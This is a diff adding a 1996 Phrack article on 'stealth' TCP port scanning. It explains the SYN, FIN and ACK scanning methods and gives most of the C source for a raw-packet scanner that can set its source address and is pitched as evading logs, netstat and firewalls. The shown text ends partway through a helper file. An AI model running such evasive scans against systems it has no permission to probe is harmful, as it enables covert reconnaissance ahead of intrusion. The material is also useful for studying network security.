+++ b/phrack49/15.txt
@@ -0,0 +1,1187 @@
+                              .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+
+                                    15 of 16
+
+ 
+             Port Scanning without the SYN flag / Uriel Maimon
+	          	(lifesux@cox.org)
+            ---------------------------------------------------------
+
+
+	Introduction :
+	--------------
+
+During the course of time, there has risen a demand to know the services
+a certain host offers.  The field of portscanning rose to offer a solution
+to this need.  At first, implementations such as SATAN, connected to each
+tcp port using the full three-way-handshake (opening a full tcp connection).
+The upside to this method is that the user who is scanning does not need to
+custom build the ip packet he is scanning with, because he uses standard
+system calls, and does not need root access (generally a uid of 0 is needed
+to use SOCK_RAW, /dev/bpf,/dev/nit and so forth) the major down side to this
+method is that it is easily detectable and also easily detered, using any 
+number of methods, most notably the TCP Wrappers made by Wietse Venema.
+
+The next step was of course SYN-scanning or 'half open scanning' which 
+implies that a full tcp connection is never established.  The process of 
+establishing a tcp connection is three phased: the originating party first
+sends a TCP packet with the SYN flag on, then the target party sends a TCP 
+packet with the flags SYN and ACK on if the port is open, or, if the port
+is closed, the target party resets the connection with the RST flag.  The 
+third phase of the negotiation is when the originating party sends a final 
+TCP packet with the ACK flag on (all these packets, of course, have the 
+corresponding sequence numbers, ack numbers, etc).  The connection is now
+open.  A SYN-scanner only sends the first packet in the three-way-handshake, 
+the SYN packet, and waits for the SYN|ACK or a RST.  When it receives one of 
+the two it knows whether or not the port is listening. The major advantage to
+this method is that it is not detected by normal logs such as "SATAN 
+detectors" or Wiestse's tcp_wrappers.  The main disadvantages are: 
+
+1) This method can still be detected by certian loggers that log SYN 
+connection attempts ('tcplog' for example), and can still be detected by 
+netstat(1).  
+
+2) The sender, under most operating systems, needs to custom build the
+entire IP packet for this kind of scanning (I don't know of any operating 
+system under which this is not true, if you know of one, please let me know).
+This requires access to SOCK_RAW (getprotbyname('raw'); under most systems)
+or /dev/bpf (Berkeley packet filter), /dev/nit (Sun 'Network Interface Tap')
+etc.  This usually requires root or privileged group access. 
+
+3) A great deal of firewalls who would filter out this scan, will not
+filter out the StealthScan(TM) (all rights reserved to vicious little red 
+blow ficiouz deliciouz (kosher) chicken surpass INC PLC LTD).
+
+
+ 	A note about UDP portscanning:
+	------------------------------
+
+In this article I will ignore UDP portscanning for the simple reason that it 
+lacks the complexity of tcp; it is not a connection oriented stream protocol
+but rather a connectionless datagram protocol.  To scan a UDP port to see if 
+it is listening, simply send any UDP packet to the port.  You will receive 
+an ICMP 'Destination Port Unreachable' packet if the port is not listening.
+
+To the best of my knowledge this is the only way to scan UDP ports.  I will 
+be glad to be corrected -- if anyone knows of a different method please 
+E-mail me. 
+
+
+	The StealthScan:
+	----------------
+
+This method relies on bad net code in the BSD code.  Since most of the 
+networking code in most any operating system today is BSD netcode or a 
+derivative thereof it works on most systems.  (A most obvious exception to 
+this is Cisco routers...  Gosh!  GOOD networking code ?!?@$! <GASP> HERESY!
+Alan Cox will have a heart attack when he hears of this!)
+
+Disadvantages of this technique:
+
+1) The IP packet must still be custom built.  I see no solution for this
+problem, unless some really insecure system calls will be put in.  I see 
+no real need for this because SLIP/PPP services are so common these days,
+getting super user access on a machine is not a problem any more.
+
+2) This method relies on bugs in net code.  This can and probably will be 
+fixed in the near future.  (Shhhhhh.  Don't tell Alan Cox.  He hates good  
+efficient networking code.) OpenBSD, for example, has already fixed this bug. 
+
+3) The outcome of a scan is never known, and the outcome is not similar over 
+different architectures and operating systems.  It is not reliable. 
+
+Main advantages of this method over the other methods: 
+
+1) Very difficult to log.  Even once the method is known, devising a logging
+method without fixing the actual bug itself is problematic. 
+
+2) Can circumvent some firewalls. 
+
+3) Will not show up on netstat(1).
+
+4) Does not consist of any part of the standard TCP three-way-handshake.
+
+5) Several different methods consisting of the same principle.
+
+The actual algorithm : 
+
+I use TCP packets with the ACK, and FIN flags turned on. I use these simply  
+because they are packets that should always return RST on an unopened
+connection sent to a port.  From now on I refer to such packets as 'RST' , 
+'FIN', or 'ACK' packets. 
+
+method #1:
+
+Send a FIN packet.  If the destination host returns a RST then the port is 
+closed, if there is no return RST then the port is listening.  The fact that 
+this method works on so many hosts is a sad testimonial to the state of the 
+networking code in most operating system kernels. 
+
+method #2
+
+Send an ACK packet.  If the returning packets ttl is lower than in the 
+rest of the RST packets received, or if the window size is greater than 
+zero, the port is probably listening.  
+
+(Note on the ttl:  This bug is almost understandable.  Every function in IP 
+is a routing function.  With every interface change, the packets ttl is 
+subtracted by one.  In the case of an open port, the ttl was decremented when
+it was received and examined, but when it was 'noticed' the flag was not a 
+SYN, a RST was sent, with a ttl one lower then if the port had simply been 
+closed.  This might not be the case.  I have not checked this theory against 
+the BSD networking code.  Feel free to correct me. 
+
+		Uriel
+/*
+ * scantcp.c
+ * 
+ * version 1.32 
+ *  
+ * Scans for listening TCP ports by sending packets to them and waiting for
+ * replies. Relys upon the TCP specs and some TCP implementation bugs found 
+ * when viewing tcpdump logs. 
+ *
+ * As always, portions recycled (eventually, with some stops) from n00k.c
+ * (Wow, that little piece of code I wrote long ago still serves as the base
+ *  interface for newer tools)
+ * 
+ * Technique:
+ * 1. Active scanning: not supported - why bother.
+ * 
+ * 2. Half-open scanning:
+ *      a. send SYN
+ *      b. if reply is SYN|ACK send RST, port is listening
+ *      c. if reply is RST, port is not listening
+ * 
+ * 3. Stealth scanning: (works on nearly all systems tested)
+ *      a. sends FIN
+ *      b. if RST is returned, not listening. 
+ *      c. otherwise, port is probably listening.
+ * 
+ * (This bug in many TCP implementations is not limited to FIN only; in fact
+ *  many other flag combinations will have similar effects. FIN alone was
+ *  selected because always returns a plain RST when not listening, and the
+ *  code here was fit to handle RSTs already so it took me like 2 minutes
+ *  to add this scanning method)
+ * 
+ * 4. Stealth scanning: (may not work on all systems)
+ *      a. sends ACK
+ *      b. waits for RST
+ *      c. if TTL is low or window is not 0, port is probably listening. 
+ * 
+ * (stealth scanning was created after I watched some tcpdump logs with
+ *  these symptoms. The low-TTL implementation bug is currently believed
+ *  to appear on Linux only, the non-zero window on ACK seems to exists on
+ *  all BSDs.)
+ * 
+ * CHANGES:
+ * --------
+ * 0. (v1.0) 
+ *    - First code, worked but was put aside since I didn't have time nor 
+ *      need to continue developing it. 
+ * 1. (v1.1)
+ *    - BASE CODE MOSTLY REWRITTEN (the old code wasn't that maintainable)
+ *    - Added code to actually enforce the usecond-delay without usleep()
+ *      (replies might be lost if usleep()ing)
+ * 2. (v1.2)
+ *    - Added another stealth scanning method (FIN). 
+ *      Tested and passed on:
+ *      AIX 3
+ *      AIX 4 
+ *      IRIX 5.3 
+ *      SunOS 4.1.3   
+ *      System V 4.0 
+ *      Linux 
+ *      FreeBSD  
+ *      Solaris
+ *    
+ *      Tested and failed on:
+ *      Cisco router with services on ( IOS 11.0)
+ *
+ * 3. (v1.21) 
+ *    - Code commented since I intend on abandoning this for a while.
+ *
+ * 4. (v1.3)
+ *    - Resending for ports that weren't replied for.
+ *      (took some modifications in the internal structures. this also
+ *	 makes it possible to use non-linear port ranges 
+ *	 (say 1-1024 and 6000))
+ *
+ * 5. (v1.31)
+ *    - Flood detection - will slow up the sending rate if not replies are
+ *	recieved for STCP_THRESHOLD consecutive sends. Saves alot of resends
+ *	on easily-flooded networks.
+ * 
+ * 6. (v1.32)
+ *      - Multiple port ranges support. 
+ *        The format is: <start-end>|<num>[,<start-end>|<num>,...]
+ *
+ *        Examples: 20-26,113
+ *                  20-100,113-150,6000,6660-6669
+ * 		  
+ * PLANNED: (when I have time for this)
+ * ------------------------------------
+ * (v2.x) - Multiple flag combination selections, smart algorithm to point
+ *          out uncommon replies and cross-check them with another flag 
+ *        
+ */
+
+#define RESOLVE_QUIET
+
+#include <stdio.h>
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <netinet/ip_tcp.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <errno.h>
+
+#include "resolve.c"
+#include "tcppkt03.c"
+
+#define STCP_VERSION "1.32"
+#define STCP_PORT  1234		       /* Our local port. */
+#define STCP_SENDS 3            
+#define STCP_THRESHOLD 8
+#define STCP_SLOWFACTOR 10
+
+/* GENERAL ROUTINES ------------------------------------------- */
+
+void banner(void)
+     {
+	printf("\nscantcp\n");
+	printf("version %s\n",STCP_VERSION);
+     }
+	
+void usage(const char *progname)
+     {
+	printf("\nusage: \n");
+	printf("%s <method> <source> <dest> <ports> <udelay> <delay> [sf]\n\n",progname);
+        printf("\t<method> : 0: half-open scanning (type 0, SYN)\n");
+	printf("\t           1: stealth scanning (type 1, FIN)\n");
+	printf("\t           2: stealth scanning (type 2, ACK)\n");
+	printf("\t<source> : source address (this host)\n");
+	printf("\t<dest>   : target to scan\n");
+	printf("\t<ports>  : ports/and or ranges to scan - eg: 21-30,113,6000\n");
+	printf("\t<udelay> : microseconds to wait between TCP sends\n");
+	printf("\t<delay>  : seconds to wait for TCP replies\n");
+	printf("\t[sf]     : slow-factor in case sends are dectected to be too fast\n\n");
+     }
+
+/* OPTION PARSING etc ---------------------------------------- */
+
+unsigned char *dest_name;
+unsigned char *spoof_name;
+struct sockaddr_in destaddr;
+
+unsigned long dest_addr;
+unsigned long spoof_addr;
+unsigned long usecdelay;
+unsigned      waitdelay;
+
+int slowfactor = STCP_SLOWFACTOR;
+
+struct portrec 			       /* the port-data structure */
+{
+   unsigned           n;
+   int                state;
+   unsigned char      ttl;
+   unsigned short int window;
+   unsigned long int  seq;
+   char               sends;
+
+} *ports;
+
+char *portstr;
+
+unsigned char scanflags;
+
+int done;
+
+int rawsock;			       /* socket descriptors */
+int tcpsock;
+
+int lastidx = 0;		       /* last sent index */
+int maxports;                          /* total number of ports */
+
+void timeout(int signum)	       /* timeout handler           */
+     {				       /* this is actually the data */
+	int someopen = 0;	       /* analyzer function. werd.  */
+	unsigned lastsent;
+	int checklowttl = 0;
+	
+	struct portrec *p;
+	
+	printf("* SCANNING IS OVER\n\n");
+	fflush(stdout);
+	
+	done = 1;
+
+	
+	for (lastsent = 0;lastsent<maxports;lastsent++)
+	  {
+	     p = ports+lastsent;
+	     if (p->state == -1) 
+	       if (p->ttl > 64)
+	       {
+		  checklowttl = 1;
+		  break;
+	       }
+	  }
+				       
+/* the above loop checks whether there's need to report low-ttl packets */
+	
+	for (lastsent = 0;lastsent<maxports;lastsent++)
+	  {	
+	     p = ports+lastsent;
+	     
+	     destaddr.sin_port = htons(p->n);
+	     
+	     tcpip_send(rawsock,&destaddr,
+			spoof_addr,destaddr.sin_addr.s_addr,
+			STCP_PORT,ntohs(destaddr.sin_port),
+			TH_RST,
+			p->seq++, 0,
+			512,
+			NULL,
+			0);
+	  }			       /* just RST -everything- sent   */
+				       /* this inclued packets a reply */
+				       /* (even RST) was recieved for  */
+	
+	
+	
+	
+	for (lastsent = 0;lastsent<maxports;lastsent++)
+	  {			       /* here is the data analyzer */
+	     p = ports+lastsent;
+	     switch (scanflags)
+	       {
+		case TH_SYN:
+		  switch(p->state)
+		    {
+		     case -1: break;  
+		     case 1 : printf("# port %d is listening.\n",p->n);
+		       someopen++;
+		       break;
+		     case 2 : printf("# port %d maybe listening (unknown response).\n",
+				     p->n);
+		       someopen++;
+		       break;
+		     default: printf("# port %d needs to be rescanned.\n",p->n);
+		    }
+		  break;
+		case TH_ACK:
+		  switch (p->state)
+		    {
+		     case -1:
+		       if (((p->ttl < 65) && checklowttl) || (p->window >0))
+			 {
+			    printf("# port %d maybe listening",p->n);
+			    if (p->ttl < 65) printf(" (low ttl)");
+			    if (p->window >0) printf(" (big window)");
+			    printf(".\n");
+			    someopen++;
+			 }
+		       break;
+		     case 1:
+		     case 2:  
+		       printf("# port %d has an unexpected response.\n",
+			      p->n);
+		       break;
+		     default: 
+		       printf("# port %d needs to be rescanned.\n",p->n);
+		    }
+		  break;
+		case TH_FIN:
+		  switch (p->state)
+		    {
+		     case -1:
+		       break;
+		     case 0 :
+		       printf("# port %d maybe open.\n",p->n);
+		       someopen++;
+		       break;
+		     default:
+		       printf("# port %d has an unexpected response.\n",p->n);
+		    }
+	       }
+	  }
+	
+	printf("-----------------------------------------------\n");
+	printf("# total ports open or maybe open: %d\n\n",someopen);
+	free(ports);
+	
+	exit(0);		       /* heh. */
+     
+     }
+
+
+int resolve_one(const char *name, unsigned long *addr, const char *desc)
+     {
+        struct sockaddr_in tempaddr;
+	if (resolve(name, &tempaddr,0) == -1) {
+	   printf("error: can't resolve the %s.\n",desc);
+	   return -1;
+	}
+            
+	*addr = tempaddr.sin_addr.s_addr;
+       	return 0;
+     }
+
+void give_info(void)
+     {
+	printf("# response address           : %s (%s)\n",spoof_name,inet_ntoa(spoof_addr));
+	printf("# target address             : %s (%s)\n",dest_name,inet_ntoa(dest_addr));
+	printf("# ports                      : %s\n",portstr);
+	printf("# (total number of ports)    : %d\n",maxports);
+	printf("# delay between sends        : %lu microseconds\n",usecdelay);
+	printf("# delay                      : %u seconds\n",waitdelay);
+        printf("# flood dectection threshold : %d unanswered sends\n",STCP_THRESHOLD);
+	printf("# slow factor                : %d\n",slowfactor);
+        printf("# max sends per port         : %d\n\n",STCP_SENDS);
+     }
+
+
+int parse_args(int argc, char *argv[]) 
+{
+       	
+   if (strrchr(argv[0],'/') != NULL) 
+     argv[0] = strrchr(argv[0],'/') + 1;
+   
+   if (argc < 7)  {
+      printf("%s: not enough arguments\n",argv[0]);
+      return -1;
+   }
+   
+   switch (atoi(argv[1]))
+     {
+      case 0  : scanflags = TH_SYN; 
+	        break;
+      case 1  : scanflags = TH_FIN; 
+	        break;
+      case 2  : scanflags = TH_ACK;
+	        break;
+      default : printf("%s: unknown scanning method\n",argv[0]);
+	        return -1;
+     }
+		 
+   spoof_name = argv[2];
+   dest_name = argv[3];    
+   
+   portstr = argv[4];
+   
+   usecdelay = atol(argv[5]);
+   waitdelay = atoi(argv[6]);
+
+   if (argc > 7) slowfactor = atoi(argv[7]);
+   
+   if ((usecdelay == 0) && (slowfactor > 0))
+     {
+	printf("%s: adjusting microsecond-delay to 1usec.\n");
+	usecdelay++;
+     }
+   return 0; 		      	
+}
+
+/* MAIN ------------------------------------------------------ */
+
+int build_ports(char *str)       /* build the initial port-database */
+{
+   int i;
+   int n;
+   struct portrec *p;
+   int sport;
+   
+   char *s;
+   
+   
+   s        = str;
+   maxports = 0;
+   n        = 0;
+   
+   while (*s != '\0')
+     {
+	switch (*s)
+	  {
+	   case '0':
+	   case '1':
+	   case '2':
+	   case '3':
+	   case '4':
+	   case '5':
+	   case '6':
+	   case '7':
+	   case '8':
+	   case '9':
+	     n *= 10;
+	     n += (*s - '0');
+	     break;
+	   case '-': 
+	     if (n == 0) return -1;
+	     sport = n;
+	     n = 0;
+	     break;
+	   case ',': 
+	     if (n == 0) return -1;
+	     if (sport != 0)
+	       {
+		  if (sport >= n) return -1;
+		  maxports += n-sport;
+		  sport = 0;
+	       } else
+	       maxports++;
+	     n = 0;
+	     break;
+	  }
+	s++;
+     }
+   if (n == 0) return -1;
+   if (sport != 0)
+     {
+	if (sport >= n) return -1;
+	maxports += n-sport;
+	sport = 0;
+     }
+   else
+     maxports++;
+   
+   maxports+=2;
+   
+   if ((ports = (struct portrec *)malloc((maxports)*sizeof(struct portrec))) == NULL)
+     {
+	fprintf(stderr,"\nerror: not enough memory for port database\n\n");
+	exit(1);
+     }
+
+   s        = str;
+   maxports = 0;
+   n        = 0;
+   
+   while (*s != '\0')
+     {
+	switch (*s)
+	  {
+	   case '0':
+	   case '1':
+	   case '2':
+	   case '3':
+	   case '4':
+	   case '5':
+	   case '6':
+	   case '7':
+	   case '8':
+	   case '9':
+	     n *= 10;
+	     n += (*s - '0');
+	     break;
+	   case '-': 
+	     if (n == 0) return -1;
+	     sport = n;
+	     n = 0;
+	     break;
+	   case ',': 
+	     if (n == 0) return -1;
+	     if (sport != 0)
+	       {
+		  if (sport >= n) return -1;
+		  while (sport <= n)
+		    {
+		       for (i=0;i<maxports;i++)
+			 if ((ports+i)->n == sport) break;
+		       
+		       if (i < maxports-1 ) 
+			 printf("notice: duplicate port - %d\n",sport);
+		       else   
+			 {
+			    (ports+maxports)->n = sport;
+			    maxports++;
+			 }
+		       sport++;
+		    }
+		  sport = 0;
+	       } else
+	       {
+		  for (i=0;i<maxports;i++)
+		    if ((ports+i)->n == n) break;
+		       
+		  if (i < maxports-1 ) 
+		    printf("notice: duplicate port - %d\n",n);
+		  else     
+		    {
+		       (ports+maxports)->n = n;
+		       maxports++;
+		    }
+	       }
+	     n = 0;
+	     break;
+	  }
+	s++;
+     }
+
+
+   if (n == 0) return -1;
+   if (sport != 0)
+     {
+	if (sport >= n) return -1;
+	while (sport <= n)
+	  {
+	     for (i=0;i<maxports;i++)
+	       if ((ports+i)->n == sport) break;
+	     
+	     if (i < maxports-1 ) 
+	       printf("notice: duplicate port - %d\n",sport);
+	     else   
+	       {
+		  (ports+maxports)->n = sport;
+		  maxports++;
+	       }
+	     sport++;
+	  }
+	sport = 0;
+     } else
+     {
+	for (i=0;i<maxports;i++)
+	  if ((ports+i)->n == n) break;
+	
+	if (i < maxports-1 ) 
+	  printf("notice: duplicate port - %d\n",n);
+	else     
+	  {
+	     (ports+maxports)->n = n;
+	     maxports++;
+	  }
+     }
+   
+   printf("\n");
+   
+   for (i=0;i<maxports;i++)
+     {
+	p        = ports+i;
+	p->state = 0;
+	p->sends = 0;
+     }
+  
+   return 0;
+   
+}
+   
+struct portrec *portbynum(int num)
+{
+   int i = 0;
+   
+   while ( ((ports+i)->n != num) && (i<maxports) ) i++;
+   
+   if ( i == maxports ) return NULL;
+
+   return (ports+i);
+}
+
+struct portrec *nextport(char save)
+{
+   struct portrec *p = ports;
+   int doneports     = 0;
+   
+   int oldlastidx = lastidx;
+      
+   while (doneports != maxports)
+     {
+	p = ports+lastidx;
+        
+	if ((p->state != 0) || (p->sends == STCP_SENDS))
+	  {
+	     doneports++; 
+	     lastidx++;
+	     lastidx %= maxports;
+	  }
+	else
+	  break;
+     }
+ 
+   if (save) 
+     lastidx = oldlastidx;
+   else
+     lastidx = (lastidx + 1) % maxports;
+   
+   if (doneports == maxports) return NULL;
+   
+   return p;
+}
+   
+   
+   
+
+inline unsigned long usecdiff(struct timeval *a, struct timeval *b)
+{
+   unsigned long s;
+   
+   s = b->tv_sec - a->tv_sec;
+   s *= 1000000;
+   s += b->tv_usec - a->tv_usec;
+   
+   return s;			       /* return the stupid microsecond diff */
+}
+
+void main(int argc, char *argv[])      
+{
+   int lastsent = 0;
+   
+   char buf[3000];
+   
+   struct iphdr  *ip   = (struct iphdr *)(buf);
+   struct tcphdr *tcp  = (struct tcphdr *)(buf+sizeof(struct iphdr));
+
+   struct sockaddr_in from;
+   int fromlen;
+  
+   struct portrec *readport;
+   
+   fd_set rset, wset;
+
+   struct timeval waitsend, now, del;
+
+   unsigned long udiff;
+   
+   int sendthreshold = 0;
+   
+   
+   banner();
+   
+   if (parse_args(argc,argv)) 
+     {  
+	usage(argv[0]); 
+	return;
+     }
+   
+   if (resolve_one(dest_name, 
+		    &dest_addr,
+		    "destination host")) exit(1);
+   
+   destaddr.sin_addr.s_addr = dest_addr;
+   destaddr.sin_family = AF_INET;
+
+   if (resolve_one(spoof_name,
+		    &spoof_addr,
+		    "source host")) exit(1);
+   
+   if ( build_ports(portstr) == -1) 
+     {
+	printf("\n%s: bad port string\n",argv[0]);
+	usage(argv[0]);
+	return;
+     }
+   
+   give_info();
+   
+   if ((tcpsock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
+     {
+	printf("\nerror: couldn't get TCP raw socket\n\n");
+	exit(1);
+     }
+   if ((rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
+     {
+	printf("\nerror: couldn't get raw socket\n\n");
+	exit(1);
+     }
+   
+   /* well, let's get to it. */
+   
+   done = 0;
+   
+   printf("* BEGINNING SCAN\n");
+   fflush(stdout);
+
+   gettimeofday(&waitsend,NULL);
+   
+   while (!done)
+     {
+
+	if (nextport(1) == NULL) 
+	  {
+	     alarm(0);	           /* no more sends, now we just  */
+	     signal(SIGALRM,timeout); /* to wait <waitdelay> seconds */
+	     alarm(waitdelay);        /* before resetting and giving */
+	  }                           /* results.                    */
+
+	FD_ZERO(&rset);
+	
+	FD_SET(tcpsock,&rset);
+	
+	gettimeofday(&now,NULL);
+	
+        udiff = usecdiff(&waitsend,&now);
+		
+	/* here comes the multiple choice select().
+	 * well, there are 3 states: 
+	 * 1. already sent all the packets.
+	 * 2. didn't send all the packets, but it's not time for another send
+	 * 3. didn't send all the packets and it is time for another send.
+	 */
+	 
+      	if (nextport(1) != NULL)
+	  if (udiff > usecdelay)
+	  {
+	     FD_ZERO(&wset);
+	     FD_SET(rawsock,&wset);
+	     select(FD_SETSIZE,&rset,&wset,NULL,NULL);
+	  } else
+	  {
+	     del.tv_sec = 0;
+	     del.tv_usec = usecdelay;
+	     select(FD_SETSIZE,&rset,NULL,NULL,&del);
+	  }
+	else
+	  select(FD_SETSIZE,&rset,NULL,NULL,NULL);
+	
+	if (FD_ISSET(tcpsock,&rset))   /* process the reply */
+	  {
+	     fromlen = sizeof(from);
+	     
+	     recvfrom(tcpsock,&buf,3000,0,
+		      (struct sockaddr *)&from,&fromlen);
+	     
+	     if (from.sin_addr.s_addr == destaddr.sin_addr.s_addr)
+	       if (ntohs(tcp->th_dport) == STCP_PORT)
+	       {
+		  printf("* got reply");
+		  
+		  readport = portbynum(ntohs(tcp->th_sport));
+		  
+		  if (readport == NULL) 
+		    printf(" -- bad port");
+		  else
+		    {
+		       sendthreshold = 0;
+		       if (!readport->state)  
+			 {
+			    readport->ttl    = ip->ttl;
+			    readport->window = tcp->th_win;
+			    
+			    if (tcp->th_flags & TH_RST)
+			      {
+				 readport->state = -1;
+				 printf(" (RST)");
+				 if (readport->ttl    < 65) printf(" (short ttl)");
+				 if (readport->window > 0) printf(" (big window)");
+			      }
+			    else
+			      if (tcp->th_flags & (TH_ACK | TH_SYN))
+			      {
+				 readport->state = 1;
+				 printf(" (SYN+ACK)");
+				 tcpip_send(rawsock,&destaddr,
+					    spoof_addr,destaddr.sin_addr.s_addr,
+					    STCP_PORT,readport->n,
+					    TH_RST,
+					    readport->seq++, 0,
+					    512,
+					    NULL,
+					    0);
+			      }
+			    else
+			      {
+				 readport->state = 2;
+				 printf(" (UNEXPECTED)");
+				 tcpip_send(rawsock,&destaddr,
+					    spoof_addr,destaddr.sin_addr.s_addr,
+					    STCP_PORT,readport->n,
+					    TH_RST,
+					    readport->seq++, 0,
+					    512,
+					    NULL,
+					    0);
+			      }
+			 }
+		       else
+			 printf(" (duplicate)");
+		    }
+		  printf("\n");
+		  fflush(stdout);
+	       }
+	  }
+	
+	if (nextport(1) != NULL)
+	  if (FD_ISSET(rawsock,&wset)) /* process the sends */
+	  {
+	     readport = nextport(0);
+	     
+	     destaddr.sin_port = htons(readport->n);
+
+	     printf("* sending to port %d ",ntohs(destaddr.sin_port));
+
+	     readport->seq = lrand48();
+	     readport->sends++;
+	     
+	     tcpip_send(rawsock,&destaddr,
+			spoof_addr,destaddr.sin_addr.s_addr,
+			STCP_PORT,ntohs(destaddr.sin_port),
+			scanflags,
+			readport->seq++, lrand48(),
+			512,
+			NULL,
+			0);
+	     
+	     gettimeofday(&waitsend,NULL);
+
+	     FD_ZERO(&wset);
+	     
+	     printf("\n");
+	     
+	     if ((++sendthreshold > STCP_THRESHOLD) && (slowfactor))
+	       {
+		  printf("\n\n -- THRESHOLD CROSSED - SLOWING UP SENDS\n\n");
+		  usecdelay *= slowfactor;
+	          sendthreshold = 0;
+	       }
+	  }
+     }
+}
+
+     
+
+/*
+ * tcp_pkt.c
+ * 
+ * routines for creating TCP packets, and sending them into sockets.
+ *
+ * (version 0.3)
+ *
+ * 
+ * BUGFIX: - it seems like the TCP pseudo header checksum was
+ *           acting up in serveral cases.
+ * ADDED : - HEXDUMP macro. 
+ *         - packet dump handling
+ */
+
+/* remove inlines for smaller size but lower speed */
+
+#include <netinet/in.h>
+#include <string.h>
+#include <sys/types.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+
+#define IPHDRSIZE sizeof(struct iphdr)
+#define TCPHDRSIZE sizeof(struct tcphdr)
+#define PSEUDOHDRSIZE sizeof(struct pseudohdr)
+
+/* ********** RIPPED CODE START ******************************** */
+
+/*
+ * in_cksum --
+ *  Checksum routine for Internet Protocol family headers (C Version)
+ */
+unsigned short in_cksum(addr, len)
+    u_short *addr;
+    int len;
+{
+    register int nleft = len;
+    register u_short *w = addr;
+    register int sum = 0;
+    u_short answer = 0;
+ 
+    /*
+     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
+     * sequential 16 bit words to it, and at the end, fold back all the
+     * carry bits from the top 16 bits into the lower 16 bits.
+     */
+    while (nleft > 1)  {
+        sum += *w++;
+        nleft -= 2;
+    }
+ 
+    /* mop up an odd byte, if necessary */
+    if (nleft == 1) {
+        *(u_char *)(&answer) = *(u_char *)w ;
+        sum += answer;
+    }
+ 
+    /* add back carry outs from top 16 bits to low 16 bits */
+    sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */
+    sum += (sum >> 16);                   /* add carry */
+    answer = ~sum;                        /* truncate to 16 bits */
+    return(answer);
+}
+
+/* ********** RIPPED CODE END ******************************** */
+
+/*
+ * HEXDUMP()
+ * 
+ * not too much to explain
+ */
+inline void HEXDUMP(unsigned len, unsigned char *data) 
+{ 
+   unsigned i;
+   for (i=0;i<len;i++) printf("%02X%c",*(data+i),((i+1)%16) ? ' ' : '\n');
+}
+
+/*
+ * tcpip_send()
+ * 
+ * sends a totally customized datagram with TCP/IP headers. 
+ */
+
+inline int tcpip_send(int      socket,
+	              struct sockaddr_in *address,
+		      unsigned long s_addr,
+		      unsigned long t_addr,
+		      unsigned      s_port,
+		      unsigned      t_port,
+		      unsigned char tcpflags,
+		      unsigned long seq,
+		      unsigned long ack,
+                      unsigned      win,
+		      char          *datagram,
+		      unsigned      datasize)
+     {
+	
+        struct pseudohdr  {
+           unsigned long saddr;
+	   unsigned long daddr;
+	   char useless;
+	   unsigned char protocol;
+	   unsigned int tcplength;
+	};
+
+	unsigned char packet[2048];
+	struct iphdr        *ip     = (struct iphdr *)packet;
+	struct tcphdr       *tcp    = (struct tcphdr *)(packet+IPHDRSIZE);
+	struct pseudohdr    *pseudo = (struct pseudohdr *)(packet+IPHDRSIZE-PSEUDOHDRSIZE);
+        unsigned char       *data   = (unsigned char *)(packet+IPHDRSIZE+TCPHDRSIZE);      
+
+	/*
+	 * The above casts will save us a lot of memcpy's later.
+         * The pseudo-header makes this way become easier than a union.
+         */
+	
+	memcpy(data,datagram,datasize);
+	memset(packet,0,TCPHDRSIZE+IPHDRSIZE);
+
+	/* The data is in place, all headers are zeroed. */
+	
+        pseudo->saddr = s_addr;
+	pseudo->daddr = t_addr;
+	pseudo->protocol = IPPROTO_TCP;   
+	pseudo->tcplength = htons(TCPHDRSIZE+datasize);  
+	
+        /* The TCP pseudo-header was created. */
+       
+	tcp->th_sport   = htons(s_port);
+	tcp->th_dport   = htons(t_port);
+	tcp->th_off     = 5;          /* 20 bytes, (no options) */
+	tcp->th_flags   = tcpflags;
+	tcp->th_seq     = htonl(seq);
+	tcp->th_ack     = htonl(ack);
+        tcp->th_win     = htons(win); /* we don't need any bigger, I guess. */
+	
+	/* The necessary TCP header fields are set. */
+	
+	tcp->th_sum = in_cksum(pseudo,PSEUDOHDRSIZE+TCPHDRSIZE+datasize);
+	
+	memset(packet,0,IPHDRSIZE); 
+	/* The pseudo-header is wiped to clear the IP header fields */
+	
+	ip->saddr    = s_addr;
+	ip->daddr    = t_addr;
+        ip->version  = 4;
+	ip->ihl      = 5;
+	ip->ttl      = 255;
+        ip->id       = random()%1996;
+	ip->protocol = IPPROTO_TCP; /* should be 6 */
+        ip->tot_len  = htons(IPHDRSIZE + TCPHDRSIZE + datasize);
+        ip->check    = in_cksum((char *)packet,IPHDRSIZE);
+        
+	/* The IP header is intact. The packet is ready. */
+
+#ifdef TCP_PKT_DEBUG
+	printf("Packet ready. Dump: \n");
+#ifdef TCP_PKT_DEBUG_DATA
+	HEXDUMP(IPHDRSIZE+TCPHDRSIZE+datasize,packet);
+#else
+	HEXDUMP(IPHDRSIZE+TCPHDRSIZE,packet);
+#endif
+        printf("\n");
+#endif
+
+	return sendto(socket, packet, IPHDRSIZE+TCPHDRSIZE+datasize, 0, (struct sockaddr *)address, sizeof(struct sockaddr));
+		
+	/* And off into the raw socket it goes. */
+     }
+	   
+	
+
+
+/*
+ * resolve.c
+ * 
+ * resolves an internet text address into (struct sockaddr_in).
+ *
+ * CHANGES: 1. added the RESOLVE_QUIET preprocessor conditions. Jan 1996
+ *          2. added resolve_rns() to always provide both name/ip. March 1996
+ */
+
+#include <sys/types.h>
+#include <string.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <netinet/in.h>
+
+int resolve( const char *name, struct sockaddr_in *addr, int port )
+     {
+	struct hostent *host;
+	
+	/* clear everything in case I forget something */
+	bzero(addr,sizeof(struct sockaddr_in));
+	
+	if (( host = gethostbyname(name) ) == NULL )  {
+#ifndef RESOLVE_QUIET
+	   fprintf(stderr,"unable to resolve host \"%s\" -- ",name);
+	   perror("");
+#endif
+	   return -1;
+	}
+	 
+	addr->sin_family = host->h_addrtype;
+	memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
+	addr->sin_port = htons(port);
+     
+        return 0;
+     }
+
+int resolve_rns( char *name , unsigned long addr )
+     {
+	struct hostent *host;
+        unsigned long address;
+	
+	address = addr;
+	host = gethostbyaddr((char *)&address,4,AF_INET);
+
